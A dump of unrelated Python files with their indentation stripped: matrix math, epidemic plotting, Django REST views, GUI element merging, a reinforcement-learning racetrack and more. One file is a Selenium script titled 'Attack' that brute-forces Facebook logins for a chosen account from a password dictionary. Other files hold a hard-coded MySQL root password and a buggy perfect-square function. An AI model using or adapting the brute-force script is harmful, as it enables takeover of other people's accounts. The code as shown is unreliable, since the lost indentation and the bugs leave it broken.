row = len(matrix[0])
col = len(matrix[0][0])
with open(file_name, 'w+') as f:
f.write(f'{layer}\n{row}\n{col}\n')
for i in matrix:
for j in i:
for item in j:
f.write(f'{item}\n')
# --------- write to json ------------------------
def write_json(self, file_name, text):
with open(file_name, 'w+') as f:
json.dump(text, f)
# --------- cheking matrices size for addition or subtruction ---------
def checking(self, matrix_a, matrix_b):
# checking the correspondence of the size of 2 matrices
if len(matrix_a) != len(matrix_b):
print("The two matrices must be the same size, i.e.\n"
"count of rows must match in size.")
exit()
col = len(matrix_a)
for i in range(col):
if len(matrix_a[i]) != len(matrix_b[i]):
print("The two matrices must be the same size, i.e.\n"
"count of columns mast match in size.")
exit()
# ---------------- addition of matrices ------------------------
def addition_3d(self, matrix3d_a, matrix3d_b):
layer_matrix = []
if len(matrix3d_a) == len(matrix3d_b):
layer = len(matrix3d_a)
else:
print('Sizes of two matrices must be the same')
for l in range(layer):
layer_matrix.append(self.addition_2d(matrix3d_a[l],matrix3d_b[l]))
self.matrix = layer_matrix
return self.matrix
def addition_2d(self, matrix_a, matrix_b):
self.matrix = []
# check correspondence of matrices
self.checking(matrix_a, matrix_b)
# addition of two matrices
for i in range(len(matrix_a)):
new_row = []
for j in range(len(matrix_a[i])):
summary = matrix_a[i][j] + matrix_b[i][j]
new_row.append(summary)
self.matrix.append(new_row)
self.rows = len(self.matrix)
self.columns = len(self.matrix[0])
return self.matrix
# ---------------- subtraction of matrices ------------------------
def subtraction_3d(self, matrix3d_a, matrix3d_b):
layer_matrix = []
if len(matrix3d_a) == len(matrix3d_b):
layer = len(matrix3d_a)
else:
print('Sizes of two matrices must be the same')
for l in range(layer):
layer_matrix.append(self.__subtraction_2d(matrix3d_a[l],
matrix3d_b[l]))
self.matrix = layer_matrix
return self.matrix
def __subtraction_2d(self, matrix_a, matrix_b):
self.checking(matrix_a, matrix_b)
self.matrix = []
# subtraction of two 2D matrices:
for i in range(len(matrix_a)):
new_row = []
for j in range(len(matrix_a[i])):
difference = matrix_a[i][j] - matrix_b[i][j]
new_row.append(difference)
self.matrix.append(new_row)
return self.matrix
# ---------------- multiplication of matrices ------------------------
def multiply_3d(self, matrix3d_a, matrix3d_b):
layer_matrix = []
if len(matrix3d_a) != len(matrix3d_b):
print('Number of layers of two matrices must be the same')
exit()
layer = len(matrix3d_a)
for l in range(layer):
self.matrix.append(self.__multiply_2d(matrix3d_a[l],
matrix3d_b[l]))
return self.matrix
def __multiply_2d(self, matrix_a, matrix_b):
matrix_2d = []
# checking compatibility of two matrices
if len(matrix_a[0]) != len(matrix_b):
print("The number of columns of the 1st matrix must be\n"
"equal the number of rows of the 2nd matrix.")
exit()
# Multiplication
for i in matrix_a:
new_row = []
for n in range(len(matrix_b[0])):
idx = 0
res = 0
for j in i:
res = res + j * matrix_b[idx][n]
idx += 1
new_row.append(round(res, 1))
matrix_2d.append(new_row)
return matrix_2d
# ---------------- scalar multiplication of matrices -----------------
def scalar_multiplication_3d(self, constant, matrix):
self.matrix = []
for layer in matrix:
new_layer = []
for row in layer:
new_row = []
for i in row:
new_row.append(round(i * constant, 2))
new_layer.append(new_row)
self.matrix.append(new_layer)
return self.matrix
# ---------------- inversion of matrices 2x2 ------------------------
def inverse2x2(self, matrix):
try:
coefficient = 1 / (matrix[0][0] * matrix[1][1] -
matrix[0][1] * matrix[1][0])
except ZeroDivisionError:
print('division by zero')
exit()
new_matrix = [[matrix[1][1], -matrix[0][1]],
[-matrix[1][0], matrix[0][0]]]
self.matrix = []
for i in new_matrix:
new_row = []
for n in i:
new_row.append(round(n * coefficient, 2))
self.matrix.append(new_row)
return self.matrix
# ---------------- division of matrices 2x2 ------------------------
def division2x2(self, matrix_a, matrix_b):
matrix_b = self.inverse2x2(matrix_b)
self.matrix = []
# Multiply A * 1/B
self.matrix = self.multiply_2d(matrix_a, matrix_b)
return self.matrix
class Convolution:
def __init__(self):
self.input_matrix = []
self.filter_matrices = []
self.final_matrix = []
def convolution2d(self):
# function returns a list of result of
# convolutions of 1xRxC matrices
final_result = []
filter_matrix = []
# loop through layers
for layer, input_list in enumerate(self.input_matrix):
resulting_list = []
number_row = len(input_list)
number_column = len(input_list[0])
filter_row = len(self.filter_matrices[layer])
filter_col = len(self.filter_matrices[layer][0])
filter_matrix = self.filter_matrices[layer]
# getting final sizes of output matrix
end_r = number_row - filter_row + 1
end_c = number_column - filter_col + 1
#calculating convolution for 1xRxC matrix
for r in range(end_r):
res_list = []
for c in range(end_c):
res = 0
for n, i in enumerate(filter_matrix):
try:
for v, j in enumerate(i):
ls = input_list[n + r][c + v]
res = res + j * ls
except TypeError:
print('Values must be numeric!')
exit()
res_list.append(res)
resulting_list.append(res_list)
final_result.append(resulting_list)
return final_result
def __convolution_3d(self, final_result=[]):
# the function receives information about the results of
# convolution of 2D matrices and, when combined,
# obtains the final result for a 3D matrix
matrix = Matrix()
add_res = []
if final_result == []:
final_result = self.convolution2d()
if len(final_result) == 1:
return final_result
add_res = matrix.addition_2d(final_result[0], final_result[1])
final_result[0] = add_res
final_result.remove(final_result[1])
for size in range(len(final_result)):
return self.__convolution_3d(final_result)
def convolution_3d(self, input_matrix: list = [], filter_matrix: list = [],
bias_value: int = 0):
self.filter_matrices = filter_matrix
base_len = len(input_matrix)
filter_len = len(filter_matrix)
deff = base_len - filter_len + 1
if deff < 1:
print('Filter matrix is larger than base matrix')
exit()
for i in range(deff):
self.input_matrix = input_matrix[i:i + filter_len]
matrices = self.__convolution_3d()
for j in matrices[0]:
for n, v in enumerate(j):
j[n] = v + bias_value
self.final_matrix.append(matrices[0])
return self.final_matrix
if __name__ == "__main__":
pass
|
import numpy as np
import matplotlib.pyplot as plt
Nt = 100
T = 30
t = np.linspace(0,T,Nt+1)
dt = t[1]-t[0]
R_list = np.zeros(Nt+1)
t_2 = np.linspace(0,T,T+1)
BP_data = [2,3,5,10,20,30,40,50,80,100,200,300,400,500,600,700,800,900,800,700,600,500,400,300,200,100,80,50,40,30,20]
for i in range(Nt):
t_ = 0.2*t[i+1]-3.4
R_list[i+1] = 890*(2*np.cosh(t_)/(np.cosh(2*t_)+1))**2
plt.plot(t,R_list)
plt.plot(t[::10],R_list[::10],'bo',label='Kermack and McKendrick')
print len(t_2)
print len(BP_data)
plt.plot(t_2,BP_data,'ro',label='Correct data from BP')
#plt.axis([0,N,0,N])
plt.xlabel("Weeks")
plt.ylabel("Deaths")
plt.title("Bombay Plague Epidemic")
plt.legend()
plt.savefig("plots/Bombay_plague.png")
plt.show()
|
#!/usr/bin/env python3
import os
def nuke():
choice = input("do you really wish to nuke this file? (y/n) ")
if choice == 'y':
os.system('zip complex_sav.zip complex')
os.system('rm -rf complex')
os.system('unzip complex.zip')
os.system('zip -r complex.zip complex')
print("-----------------------------")
print("-----------------------------")
print("----Bomb has been dropped----")
print("-----------------------------")
print("-----------------------------")
else:
print("Launch aborted")
nuke()
|
import setuptools
with open("README.md", "r") as filep:
long_description = filep.read()
setuptools.setup(
name='Recombination_analysis',
version='0.1.4',
description='Analyze recombination events using kmers',
url='https://github.com/zhuweix/recombination_analysis',
author='Zhuwei Xu',
author_email='zhuweix8@gmail.com',
license='MIT',
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[
'matplotlib',
'bitarray',
'numpy'],
zip_safe=False,
python_requires='>=3.6') |
"""
*******
Errors
*******
Custom exceptions for ingest
"""
class InvalidIngestStageParameters(Exception):
"""
Exception raised if parameters passed to IngestStage.run fail validation
"""
# TODO
# Pretty stack straces using Pythons traceback module
pass
|
import re
def myAtoi(str):
raw_strig = str
new_string = re.sub("^\s*", "", raw_strig)
if not len(new_string):
return 0
elif new_string[0] == "-":
if len(new_string) == 1:
return 0
multiplier = -1
new_string = new_string[1:]
elif new_string[0] == "+":
if len(new_string) == 1:
return 0
multiplier = 1
new_string = new_string[1:]
else:
multiplier = 1
# print("New String: {}".format(new_string))
integer_string = re.match(r"^[0-9]*", new_string)
# print("Integer String: {}".format(integer_string))
if integer_string.group() == "":
return 0
else:
new_string = integer_string.group(0)
# print new_string
atoi = int(new_string) * multiplier
if atoi >= 2147483648:
atoi = 2147483647
elif atoi < -2147483648:
atoi = -2147483648
return atoi
print(myAtoi("-2147483648"))
# print(myAtoi(" -23423423aljsd")) |
import json
import cv2
import numpy as np
from os.path import join as pjoin
import os
import time
import shutil
from detect_merge.Element import Element
def show_elements(org_img, eles, show=False, win_name='element', wait_key=0, shown_resize=None, line=2):
color_map = {'Text':(0, 0, 255), 'Compo':(0, 255, 0), 'Block':(0, 255, 0), 'Text Content':(255, 0, 255)}
img = org_img.copy()
for ele in eles:
color = color_map[ele.category]
ele.visualize_element(img, color, line)
img_resize = img
if shown_resize is not None:
img_resize = cv2.resize(img, shown_resize)
if show:
cv2.imshow(win_name, img_resize)
cv2.waitKey(wait_key)
if wait_key == 0:
cv2.destroyWindow(win_name)
return img_resize
def save_elements(output_file, elements, img_shape):
components = {'compos': [], 'img_shape': img_shape}
for i, ele in enumerate(elements):
c = ele.wrap_info()
# c['id'] = i
components['compos'].append(c)
json.dump(components, open(output_file, 'w'), indent=4)
return components
def reassign_ids(elements):
for i, element in enumerate(elements):
element.id = i
def refine_texts(texts, img_shape):
refined_texts = []
for text in texts:
# remove potential noise
if len(text.text_content) > 1 and text.height / img_shape[0] < 0.075:
refined_texts.append(text)
return refined_texts
def merge_text_line_to_paragraph(elements, max_line_gap=5):
texts = []
non_texts = []
for ele in elements:
if ele.category == 'Text':
texts.append(ele)
else:
non_texts.append(ele)
changed = True
while changed:
changed = False
temp_set = []
for text_a in texts:
merged = False
for text_b in temp_set:
inter_area, _, _, _ = text_a.calc_intersection_area(text_b, bias=(0, max_line_gap))
if inter_area > 0:
text_b.element_merge(text_a)
merged = True
changed = True
break
if not merged:
temp_set.append(text_a)
texts = temp_set.copy()
return non_texts + texts
def refine_elements(compos, texts, intersection_bias=(2, 2), containment_ratio=0.8):
'''
1. remove compos contained in text
2. remove compos containing text area that's too large
3. store text in a compo if it's contained by the compo as the compo's text child element
'''
elements = []
contained_texts = []
for compo in compos:
is_valid = True
text_area = 0
for text in texts:
inter, iou, ioa, iob = compo.calc_intersection_area(text, bias=intersection_bias)
if inter > 0:
# the non-text is contained in the text compo
if ioa >= containment_ratio:
is_valid = False
break
text_area += inter
# the text is contained in the non-text compo
if iob >= containment_ratio and compo.category != 'Block':
contained_texts.append(text)
if is_valid and text_area / compo.area < containment_ratio:
# for t in contained_texts:
# t.parent_id = compo.id
# compo.children += contained_texts
elements.append(compo)
# elements += texts
for text in texts:
if text not in contained_texts:
elements.append(text)
return elements
def check_containment(elements):
for i in range(len(elements) - 1):
for j in range(i + 1, len(elements)):
relation = elements[i].element_relation(elements[j], bias=(2, 2))
if relation == -1:
elements[j].children.append(elements[i])
elements[i].parent_id = elements[j].id
if relation == 1:
elements[i].children.append(elements[j])
elements[j].parent_id = elements[i].id
def remove_top_bar(elements, img_height):
new_elements = []
max_height = img_height * 0.04
for ele in elements:
if ele.row_min < 10 and ele.height < max_height:
continue
new_elements.append(ele)
return new_elements
def remove_bottom_bar(elements, img_height):
new_elements = []
for ele in elements:
# parameters for 800-height GUI
if ele.row_min > 750 and 20 <= ele.height <= 30 and 20 <= ele.width <= 30:
continue
new_elements.append(ele)
return new_elements
def compos_clip_and_fill(clip_root, org, compos):
def most_pix_around(pad=6, offset=2):
'''
determine the filled background color according to the most surrounding pixel
'''
up = row_min - pad if row_min - pad >= 0 else 0
left = col_min - pad if col_min - pad >= 0 else 0
bottom = row_max + pad if row_max + pad < org.shape[0] - 1 else org.shape[0] - 1
right = col_max + pad if col_max + pad < org.shape[1] - 1 else org.shape[1] - 1
most = []
for i in range(3):
val = np.concatenate((org[up:row_min - offset, left:right, i].flatten(),
org[row_max + offset:bottom, left:right, i].flatten(),
org[up:bottom, left:col_min - offset, i].flatten(),
org[up:bottom, col_max + offset:right, i].flatten()))
most.append(int(np.argmax(np.bincount(val))))
return most
if os.path.exists(clip_root):
shutil.rmtree(clip_root)
os.mkdir(clip_root)
bkg = org.copy()
cls_dirs = []
for compo in compos:
cls = compo['class']
if cls == 'Background':
compo['path'] = pjoin(clip_root, 'bkg.png')
continue
c_root = pjoin(clip_root, cls)
c_path = pjoin(c_root, str(compo['id']) + '.jpg')
compo['path'] = c_path
if cls not in cls_dirs:
os.mkdir(c_root)
cls_dirs.append(cls)
position = compo['position']
col_min, row_min, col_max, row_max = position['column_min'], position['row_min'], position['column_max'], position['row_max']
cv2.imwrite(c_path, org[row_min:row_max, col_min:col_max])
# Fill up the background area
cv2.rectangle(bkg, (col_min, row_min), (col_max, row_max), most_pix_around(), -1)
cv2.imwrite(pjoin(clip_root, 'bkg.png'), bkg)
def merge(img_path, compo_path, text_path, merge_root=None, is_paragraph=False, is_remove_bar=True, show=False, wait_key=0):
compo_json = json.load(open(compo_path, 'r'))
text_json = json.load(open(text_path, 'r'))
# load text and non-text compo
ele_id = 0
compos = []
for compo in compo_json['compos']:
element = Element(ele_id, (compo['column_min'], compo['row_min'], compo['column_max'], compo['row_max']), compo['class'])
compos.append(element)
ele_id += 1
texts = []
for text in text_json['texts']:
element = Element(ele_id, (text['column_min'], text['row_min'], text['column_max'], text['row_max']), 'Text', text_content=text['content'])
texts.append(element)
ele_id += 1
if compo_json['img_shape'] != text_json['img_shape']:
resize_ratio = compo_json['img_shape'][0] / text_json['img_shape'][0]
for text in texts:
text.resize(resize_ratio)
# check the original detected elements
img = cv2.imread(img_path)
img_resize = cv2.resize(img, (compo_json['img_shape'][1], compo_json['img_shape'][0]))
show_elements(img_resize, texts + compos, show=show, win_name='all elements before merging', wait_key=wait_key)
# refine elements
texts = refine_texts(texts, compo_json['img_shape'])
elements = refine_elements(compos, texts)
if is_remove_bar:
elements = remove_top_bar(elements, img_height=compo_json['img_shape'][0])
elements = remove_bottom_bar(elements, img_height=compo_json['img_shape'][0])
if is_paragraph:
elements = merge_text_line_to_paragraph(elements, max_line_gap=7)
reassign_ids(elements)
check_containment(elements)
board = show_elements(img_resize, elements, show=show, win_name='elements after merging', wait_key=wait_key)
# save all merged elements, clips and blank background
name = img_path.replace('\\', '/').split('/')[-1][:-4]
components = save_elements(pjoin(merge_root, name + '.json'), elements, img_resize.shape)
cv2.imwrite(pjoin(merge_root, name + '.jpg'), board)
print('[Merge Completed] Input: %s Output: %s' % (img_path, pjoin(merge_root, name + '.jpg')))
return board, components
|
from selenium import webdriver
import time
## Author = [Przemysław Szmaj]
## GitHub = https://github.com/PSZMAJ
## YouTube = https://www.youtube.com/channel/UCewT7Lr5f6LWvqSPXm0JKRw
login = input('Please eneter login: ')
browser = webdriver.Firefox()
browser.get('https://www.facebook.com/login.php')
class Attack:
def addlogin(self):
# locate xpath and send login.
self.button_username = browser.find_element_by_xpath('//*[@id="email"]')
self.button_username.click()
time.sleep(0.5)
self.button_username.send_keys(login)
time.sleep(0.5)
def FbBruteForceDictionary(self):
# this function has a special task:
# 1. Locate xpath form "password"
# 2. Send key from dictionary.
# 3. Locate xpath button login and click.
login_attempt = 0
with open("dict.txt", "r") as file:
lines = file.readlines()
for line in lines:
self.button_password = browser.find_element_by_xpath('//*[@id="pass"]')
self.button_password.click()
time.sleep(0.5)
self.button_password.send_keys(line)
self.button_login = browser.find_element_by_xpath('//*[@id="loginbutton"]')
self.button_login.click()
login_attempt = login_attempt + 1
print("____________________________________________________________")
print(' Login attempt', login_attempt, ' with key/password : ', line )
print("____________________________________________________________")
p = Attack()
p.addlogin()
p.FbBruteForceDictionary() |
def is_perfect_square(n):
x = n // 2
y = set([x])
while x * x != n:
x = (x + (n // x)) // 2
if x in y: return false
y.add(x)
return True
print(is_perfect_square(8))
print(is_perfect_square(9))
print(is_perfect_square(100))
|
# -*- coding: utf-8 -*-
import logging
from .mysql import MySQLSingle, MySQLFoxHA, MySQLFoxHAAWS
from .mysql import MySQLSingleGCP, MySQLFoxHAGCP
from physical.models import Instance
from base import InstanceDeploy
LOG = logging.getLogger(__name__)
class MySQLPerconaSingle(MySQLSingle):
@property
def driver_name(self):
return 'mysql_percona_single'
def deploy_instances(self):
return [[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]]
class MySQLPerconaFoxHA(MySQLFoxHA):
@property
def driver_name(self):
return 'mysql_percona_foxha'
def deploy_instances(self):
return [
[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)],
[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]
]
class MySQLPerconaFoxHAAWS(MySQLFoxHAAWS):
@property
def driver_name(self):
return 'mysql_percona_foxha'
def deploy_instances(self):
return [
[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)],
[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]
]
class MySQLPerconaSingleGCP(MySQLSingleGCP):
@property
def driver_name(self):
return 'mysql_percona_single'
def deploy_instances(self):
return [[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]]
class MySQLPerconaFoxHAGCP(MySQLFoxHAGCP):
@property
def driver_name(self):
return 'mysql_percona_foxha'
def deploy_instances(self):
return [
[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)],
[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]
]
|
import mysql.connector
mydb = mysql.connector.connect(host="localhost",user="root",passwd="krishnatej",database="sample1")
mycursor = mydb.cursor()
mycursor.execute("select * from s1")
for i in mycursor:
print(i) |
import sys
import pandas as pds
import numpy as np
if len(sys.argv) < 3:
print("Usage check_predict csv_file_name predict_field_name")
sys.exit()
filename = sys.argv[1]
predict = sys.argv[2]
print("Checking " + predict + " in " + filename)
dataf = pds.read_csv(filename,
sep=',',
usecols=[predict],
skipinitialspace=True,
quotechar='"')
predict_array = dataf[[predict]].values
print(predict_array)
print type(predict_array)
unique_list = []
count_dict = {}
for row in predict_array:
val = row[0]
print (val)
print type(val)
if not val:
continue
if val not in unique_list:
unique_list.append(val)
count_dict[val] = 1
else:
count_dict[val] = count_dict[val] + 1
print(str(count_dict)) |
# coding: utf-8
from datetime import timedelta
from rest_framework.views import APIView
from rest_framework import generics
from rest_framework.response import Response
from rest_framework import exceptions
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework import status
from rest_framework.authtoken.models import Token
from django.shortcuts import get_object_or_404
from django.conf import settings
from django.db import transaction, IntegrityError
from djoser import views as djoser_views
from api import models, serializers
from retalk import helpers
class APIStopCap(APIView):
""" View to close unneeded path of djoser """
def dispatch(self, request, *args, **kwargs):
raise exceptions.PermissionDenied
class CheckToken(APIView):
""" View just to check user auth token. If token is correct
http-response with staus 200 (OK) returns
"""
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
def post(self, request, format=None, **kwargs):
return Response({'success': True}, status=status.HTTP_200_OK)
class DetailUserInfo(generics.RetrieveAPIView):
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = serializers.PersonalInfoSerializer
def get_object(self):
return get_object_or_404(models.User, email=self.email)
def get(self, request, format=None, **kwargs):
""" Show user profile """
self.email = kwargs.get('email', None)
return super(DetailUserInfo, self).get(request, format, **kwargs)
class MyProfile(generics.RetrieveUpdateAPIView):
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = serializers.PersonalInfoSerializer
def save_ct(self, request):
import os
from django.conf import settings
path = os.path.join(settings.BASE_DIR, 'ct.txt')
with open(path, 'a') as f:
f.write(request.META.get('CONTENT_TYPE') + '\n')
def get_object(self):
return self.usr
def catch_user(self, request):
# self.save_ct(request)
self.usr = request.user
def get(self, request, format=None, **kwargs):
""" Get my personal info """
self.catch_user(request)
return super(MyProfile, self).get(request, format, **kwargs)
def put(self, request, format=None, **kwargs):
""" Change my profile """
self.catch_user(request)
return super(MyProfile, self).put(request, format, **kwargs)
def patch(self, request, *args, **kwargs):
""" Change my profile too """
self.catch_user(request)
return super(MyProfile, self).patch(request, *args, **kwargs)
def options(self, request, *args, **kwargs):
self.catch_user(request)
return super(MyProfile, self).options(request, *args, **kwargs)
class StatusTag(generics.UpdateAPIView, generics.ListAPIView):
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = serializers.StatusTagSerializer
def put(self, request, *args, **kwargs):
""" Set new status tag """
user = request.user
serializer = self.serializer_class(user, data=request.data)
if serializer.is_valid():
# collect old status-tags for statistic
if user.status_tag:
user.archive_status_tag()
user.status_created_time = helpers.aware_now()
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def patch(self, request, *args, **kwargs):
""" Set new status tag too"""
return self.put(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
""" Get all status tags near request user """
try:
cur_latitude = float(request.GET.get('latitude', None)) # широта
cur_longitude = float(
request.GET.get('longitude', None)) # долгота
except (TypeError, ValueError):
return Response({}, status=status.HTTP_400_BAD_REQUEST)
latitude_delta = settings.LATITUDE_DELTA
longitude_delta = helpers.get_longitude_delta(cur_latitude, settings.R)
qs = models.User.objects.filter(is_active=True,
latitude__gte=cur_latitude - latitude_delta,
latitude__lte=cur_latitude + latitude_delta,
longitude__gte=cur_longitude - longitude_delta,
longitude__lte=cur_longitude + longitude_delta).exclude(pk=request.user.pk)
answer = {}
for usr in qs:
if usr.status_created_time and usr.status_expire_time:
td = helpers.td_in_minutes(
helpers.aware_now() - usr.status_created_time)
# status tag is still actual
if td <= usr.status_expire_time:
status_data = self.serializer_class(usr).data
status_data['minutes_passed'] = td
status_data['avatar'] = '%s://%s%s' % (
request.scheme, request.META['HTTP_HOST'],
usr.avatar.url) if usr.avatar else ''
answer[usr.email] = status_data
return Response(answer)
class SetPassword(djoser_views.SetPasswordView):
""" Change password view. Use djoser one + remove current token """
def action(self, serializer):
try:
with transaction.atomic():
# we do not need try/except because this view only for authenticated
# users, who definitely have a token
old_token = Token.objects.get(user=self.request.user)
old_token.delete()
self.request.user.set_password(serializer.data['new_password'])
self.request.user.save()
new_token = Token.objects.create(user=self.request.user)
answer = {"auth_token": new_token.key}
answer_status = status.HTTP_200_OK
except IntegrityError:
answer = {'transaction_rerror': 'Smth is wrong. Transaction rolled back'}
answer_status = status.HTTP_400_BAD_REQUEST
return Response(answer, status=answer_status)
class Logout(djoser_views.LogoutView):
""" Logout user and send not empty http-response body """
def post(self, request):
super(Logout, self).post(request)
return Response({"success": True}, status=status.HTTP_200_OK)
|
import requests
import os
from tqdm import tqdm
import sys
def get_json(url):
"""
Gets a json response from the given url.
:param url: URL.
:return: the received Json data.
"""
resp = requests.get(url=url)
return resp.json()
def get_file(url, output_file, show_progress_bar=True):
"""
Downloads a file.
Source: https://github.com/sirbowen78/lab/blob/master/file_handling/dl_file1.py
:param url: url of the file to be downloaded
:param output_file: file where the downloaded data is saved.
:param show_progress_bar: If true progressbar is shown otherwise False
:return: None
"""
filesize = int(requests.head(url).headers["Content-Length"])
os.makedirs(os.path.dirname(output_file), exist_ok=True)
chunk_size = 1024
with requests.get(url, stream=True) as r, open(output_file, "wb") as f, tqdm(
unit="B",
unit_scale=True,
unit_divisor=1024,
total=filesize,
file=sys.stdout,
disable=not show_progress_bar,
desc="Downloading file {}".format(os.path.basename(output_file),
)
) as progress:
for chunk in r.iter_content(chunk_size=chunk_size):
# download the file chunk by chunk
datasize = f.write(chunk)
# on each chunk update the progress bar.
progress.update(datasize)
|
"""
The Python standard library's 'calendar' module allows you to
render a calendar to your terminal.
https://docs.python.org/3.6/library/calendar.html
Write a program that accepts user input of the form
`14_cal.py month [year]`
and does the following:
- If the user doesn't specify any input, your program should
print the calendar for the current month. The 'datetime'
module may be helpful for this.
- If the user specifies one argument, assume they passed in a
month and render the calendar for that month of the current year.
- If the user specifies two arguments, assume they passed in
both the month and the year. Render the calendar for that
month and year.
- Otherwise, print a usage statement to the terminal indicating
the format that your program expects arguments to be given.
Then exit the program.
"""
import sys
import calendar
from datetime import datetime
current_month = int(datetime.now().month)
current_year = int(datetime.now().year)
if len(sys.argv) <= 1:
print(calendar.month(current_year, current_month))
elif len(sys.argv) == 2:
print(calendar.month(current_year, int(sys.argv[1])))
elif len(sys.argv) == 3:
print(calendar.month(int(sys.argv[2]), int(sys.argv[1])))
else:
print(
'The format is :\n\n"14_cal.py month [year]"\n\n where "month" is a number 1-12 and "[year]" is a optional 4 digit number.') |
import os
def visit_directory(path, file_name):
dirs = os.listdir(path)
for dir in dirs:
sub_path = os.path.join(path, dir)
if dir == file_name and os.path.isfile(sub_path):
os.remove(sub_path)
return True
elif os.path.isdir(sub_path):
visit_directory(sub_path, file_name)
|
import numpy as np
import pickle
import matplotlib.pyplot as plt
class RaceTrack:
def __init__(self, course):
self.v_max = 5
self._load_course(course)
self.reset()
def _load_course(self, course):
# flip course upside down so 0,0 is botton left
self.course = np.flipud(course)
# 0 are walls
# 1 is the track
# 8 are starts
# 9 are ends
self.starts = np.where(self.course == 8)
self.starts = np.transpose(self.starts)
def reset(self):
s = np.random.randint(0, len(self.starts))
self.position = self.starts[s].copy()
self.velocity = np.array([1, 0])
def valid_actions(self):
return [(x, y) for x in range(-1, 2) for y in range(-1, 2)]
def _update(self, action):
temp = self.velocity
self.velocity += action
self.velocity = np.clip(self.velocity, 0, self.v_max)
# if both velocity are 0. Set the previous max to 1
if np.sum(self.velocity) == 0:
self.velocity[np.argmax(temp)] = 1
temp = self.position
self.position += self.velocity
self.position[0] = np.clip(self.position[0],
0, np.shape(self.course)[0] - 1)
self.position[1] = np.clip(self.position[1],
0, np.shape(self.course)[1] - 1)
def step(self, action):
self._update(action)
pos = self.course[self.position[0], self.position[1]]
observation = (self.position, self.velocity)
if pos == 0:
done = True
reward = -1000
elif pos == 9:
done = True
reward = 0
else:
done = False
reward = -1
return observation, reward, done
def get_observation(self):
return self.position, self.velocity
def print_state(self):
state = self.course.copy()
state[self.position[0], self.position[1]] = 5
#print(np.array2string(state))
plt.imshow(state, cmap='hot')
plt.show()
class Agent:
def __init__(self, env):
self.env = env
self.gamma = 0.9
self.epsilon = 0.1
self.reset()
def reset(self):
self.Q = np.zeros((np.prod(np.shape(self.env.course)),
(self.env.v_max + 1)**2, 9))
self.N = np.zeros((np.prod(np.shape(self.env.course)),
(self.env.v_max + 1)**2, 9))
self.D = np.zeros((np.prod(np.shape(self.env.course)),
(self.env.v_max + 1)**2, 9))
self.pi = np.ones((np.prod(np.shape(self.env.course)),
(self.env.v_max + 1)**2), dtype='int') * 8
self._update_mu()
def _update_mu(self):
self.mu = np.ones((np.prod(np.shape(self.env.course)),
(self.env.v_max + 1)**2, 9))
self.mu *= self.epsilon / 9
for i, j in np.ndindex(np.shape(self.mu)[0:2]):
self.mu[i, j, int(self.pi[i, j])] += 1 - self.epsilon
def _hash_position(self, position):
m = np.shape(self.env.course)[1]
return m*position[0] + position[1]
def _position_from_hash(self, p_hash):
m = np.shape(self.env.course)[1]
i = p_hash//m
j = p_hash % m
return i, j
def _hash_velocity(self, velocity):
m = self.env.v_max
return m*velocity[0] + velocity[1]
def _velocity_from_hash(self, v_hash):
m = self.env.v_max
i = v_hash//m
j = v_hash % m
return i, j
def _hash_action(self, action):
return 3*(action[0] + 1) + action[1] + 1
def _action_from_hash(self, a_hash):
i = a_hash // 3 - 1
j = a_hash % 3 - 1
return i, j
def _obs_to_state(self, obs):
state = []
state.append(int(self._hash_position(obs[0])))
state.append(int(self._hash_velocity(obs[1])))
return state
def _state_to_obs(self, state):
obs = [(0,0), (0,0)]
obs[0] = self._position_from_hash(state[0])
obs[1] = self._velocity_from_hash(state[1])
return obs
def _generate_episode(self, greedy=False):
done = False
self.env.reset()
obs = self.env.get_observation()
states = []
actions = []
rewards = []
while not done:
s = self._obs_to_state(obs)
states.append(s)
if not greedy:
a = np.random.choice(range(9), p=self.mu[s[0], s[1]])
else:
a = self.pi[s[0], s[1]]
actions.append(a)
a = self._action_from_hash(a)
obs, r, done = self.env.step(a)
rewards.append(r)
states.append(self._obs_to_state(obs))
return states, actions, rewards
def _get_last_non_greedy(self, s, a):
# remove terminal state
s = s[:-1]
for i in reversed(range(len(s))):
if self.pi[s[i][0], s[i][1]] != a[i]:
return i
# if the episode follows pi all along return the terminal state index
return len(s) + 1
def _update_Q(self, s, a, r, tau):
sa = list(zip(s[tau:-1], a[tau:]))
unique_sa = set([(s[0][0], s[0][1], s[1]) for s in sa])
# we want r1 for s0a0 but because there is no r0 in r : r[0] = r1
r = r[tau:]
for elt in unique_sa:
i = sa.index(([elt[0], elt[1]], elt[2]))
Gi = np.sum([r[i + x] * self.epsilon**x \
for x in range(len(sa) - i)])
# W = np.prod([1 / self.mu[sa[j][0][0], sa[j][0][1], sa[j][1]]
# for j in range(i + 1, len(sa))])
W = (1 / (1 - self.epsilon + (self.epsilon / 9)))**(len(sa)-(i+1))
self.N[sa[i][0][0], sa[i][0][1], sa[i][1]] += W
c = self.N[sa[i][0][0], sa[i][0][1], sa[i][1]]
temp = self.Q[sa[i][0][0], sa[i][0][1], sa[i][1]]
self.Q[sa[i][0][0], sa[i][0][1], sa[i][1]] += W / c * (Gi - temp)
def _update_policies(self):
for p, v in np.ndindex(np.shape(self.pi)):
self.pi[p, v] = np.argmax(self.Q[p, v])
self._update_mu()
def _print_episode(self, s):
state = self.env.course.copy()
pos = [p[0] for p in s]
pos = [self._position_from_hash(p) for p in pos]
for p in pos:
state[p[0], p[1]] = 5
#print(np.array2string(state))
plt.imshow(state, cmap='hot')
plt.show()
def play(self, n, display=False):
for _ in range(n):
s, a, r = self._generate_episode(True)
if display:
self._print_episode(s)
def train(self, n, display=False):
for _ in range(n):
s, a, r = self._generate_episode()
tau = self._get_last_non_greedy(s, a)
if tau == len(s):
pass
self._update_Q(s, a, r, tau)
self._update_policies()
